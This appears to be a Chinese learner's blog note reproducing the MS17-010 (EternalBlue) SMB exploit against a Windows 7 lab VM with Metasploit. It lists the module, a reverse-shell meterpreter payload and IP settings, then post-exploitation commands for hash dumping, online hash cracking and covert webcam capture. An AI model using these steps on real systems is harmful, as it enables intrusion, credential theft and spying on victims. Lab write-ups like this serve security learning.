网安学习笔记 1 ---- ms17-010 的复现

2023.9.8

漏洞描述:Microsoft Windows SMB Server远程代码执行漏洞

Microsoft Server Message Block 1.0 (SMBv1)服务器处理某些请求时,在实现上存在远程代码执行漏洞,成功利用后可使攻击者在目标服务器上执行任意代码。如果攻击失败,会导致拒绝服务,对业务造成一定安全风险。

Microsoft Windows Server 2016、Microsoft Windows Server 2012 R2、Microsoft Windows Server 2012、Microsoft Windows Server 2008 R2、Microsoft Windows Server 2008、Microsoft Windows RT 8.1等等

一、前期准备

         1、打开win7虚拟机并用 ipconfig 查看win7 ip

         

          2、kali提权

         3、使用 ifconfig 或 ip a 查看kali ip

二、开始测试

        1、输入 msfconsole 

        2、 输入 search ms17-010 搜索漏洞

        3、输入 use 0 使用序号为 0 的 exploit/windows/smb/ms17_010_eternalblue 攻击模块

        4、输入 set payload windows/x64/meterpreter/reverse_tcp 设置负载

        5、输入 set rhosts 192.168.190.129 设置目标ip

        6、输入 set lhost 192.168.190.255 设置攻击者ip

        7、输入 run 或 exploit 开始攻击

        8、当结果为 meterpreter 即为成功

三、成功后 

        1、输入 screenshot 可获得目标机屏幕截图

        2、输入 getuid 可得知目前权限为管理员

        3、输入 hashdump 可得到登录密码的密文

        4、使用工具进行解密 md5在线解密破解,md5解密加密icon-default.png?t=N7T8https://www.cmd5.com/

        5、输入 webcam_list 查看是否存在摄像头

        6、输入 webcam_snap 使用摄像头拍照

        7、输入 webcam_stream 使用摄像头录像

                监控画面 

                                                                                                                                                          

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Z时代.bug(゜▽゜*)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值